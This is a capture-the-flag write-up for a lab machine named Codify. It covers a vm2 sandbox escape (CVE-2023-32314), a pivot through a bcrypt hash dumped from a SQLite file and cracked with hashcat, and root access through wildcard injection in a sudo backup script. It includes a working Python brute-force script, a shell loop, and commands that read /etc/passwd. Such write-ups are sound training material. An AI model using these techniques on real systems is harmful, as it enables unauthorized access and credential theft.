Week 6. Codify
TL;DR
This is an Ubuntu 22.04 machine running a web application created with vulnerable version of vm2 library (CVE-2023-32314). Exploiting the vulnerability, we get initial foothold, and pivot to SSH user is gained through password hunting in the file system. Escalation is achieved exploiting vulnerability in local backup shell script, for this purpose we generate our own custom exploit.
KEYWORDS
Node.js, vm2, CVE-2023-32314, exploit scripting.
REFERENCES
https://www.cvedetails.com/cve/CVE-2023-32314
https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
https://www.baeldung.com/linux/bash-single-vs-double-brackets#4-pattern-matching
ENUMERATION
Port scan.
> nmap $target -p- -T4 -Pn --open --reason
nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-05 06:35 EST
Nmap scan report for 10.129.156.20
Host is up, received user-set (0.065s latency).
Not shown: 64814 closed tcp ports (conn-refused), 718 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
3000/tcp open ppp syn-ack
Nmap done: 1 IP address (1 host up) scanned in 30.45 secondsThere are 2 web servers running. If you browse with Firefox, you see they are made with vm2 library.
For initial foothold, we'll focus on exploiting vm2 vulnerabilities.
USER
Searching for vm2 vulnerabilities, we came across this CVE-2023-32314 (https://www.cvedetails.com/cve/CVE-2023-32314). Also, a PoC is available in GitHub: https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
Running it in the application we have immediate code execution.
Then run a reverse shell.
Once inside the machine, first step is to inspect the /etc/passwd file, which reveals our first goal would be to pivot to user joshua
> cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
joshua:x:1000:1000:,,,:/home/joshua:/bin/bash
svc:x:1001:1001:,,,:/home/svc:/bin/bashSearching for interesting files we came across this one /var/www/contact/tickets.db, which turns out to contain Joshua's password hash.
> cat /var/www/contact/tickets.db
�T5��T�format 3@ .WJ
otableticketsticketsCREATE TABLE tickets (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, topic TEXT, description TEXT, status TEXT)P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)�� tableusersusersCREATE TABLE users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT UNIQUE,
password TEXT
��G�joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
��
����ua users
ickets
r]r�h%%�Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to set this up locally? Like instead of coming to this site, can I download this and set it up in my own computer? A feature like that would be nice.open� ;�wTom HanksNeed networking modulesI think it would be better if you can implement a way to handle network-based stuff. Would help me out a lot. Thanks!openThis is a blowfish hash that can be cracked with Hashcat (module 3200).
> hashcat -m 3200 -a 0 -d 1 hash.txt .\rockyou.txt -r .\rockyou-30000.ruleSSH in as user joshua using found credentials and collect the flag.
SYSTEM
Let's see if joshua is a sudoer.
sudo -l
[sudo] password for joshua:
Matching Defaults entries for joshua on codify:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User joshua may run the following commands on codify:
(root) /opt/scripts/mysql-backup.shIt seems he can sudo run a backup script located at /opt/scripts/mysql-backup.sh. Inspecting the code of the script we realize it is vulnerable to wildcard injection.
The use of double brackets in the if comparison allows us to use wildcards to guess the password, using a process similar to blind SQL injections.
To find out more about the difference between single brackets and double brackets read this: https://www.baeldung.com/linux/bash-single-vs-double-brackets#4-pattern-matching
In summary, both conditions [[$DB_PASS == Password123!]] and [[$DB_PASS == P* ]] will be evaluated as true in the if statement.
To brute force the password you can use 3 methods:
Manually. Letter by letter, not recommended.
Semi-manually. Create a file called
lettercontaining all lower-case, upper-case and digits and bruteforce them using a loop. As soon as you find a new character, add it to the for loop (e.g....echo abcde*...) and repeat until no more letters are discovered. Add letters sequentially as you discover in each iteration. The first loop iteration would look like this:
for i in $(cat letters);do echo a* | sudo /opt/scripts/mysql-backup.sh && echo "$i";doneUsing our own Python script. Elegant and fast. The machine also has Perl installed. A proposed Python script would be the following:
import string
import os
chars = string.ascii_letters + string.digits
password=''
next=1
print("[+] initializing bruteforce script...")
print("[+] bruteforce in progress, please wait...")
while next==1:
for i in chars:
errorlevel=os.system("echo "+password+i+"* | sudo /opt/scripts/mysql-backup.sh >/dev/null 2>&1")
if errorlevel==0:
password=password+i
print("[+] new character found: "+password)
next=1
break
else: next=0
print("[+] process terminated, root password is: "+password)Running it, the root MySQL password is revealed in less than a minute, which turns out to be a reuse of the system's root password.
You are root.
Last updated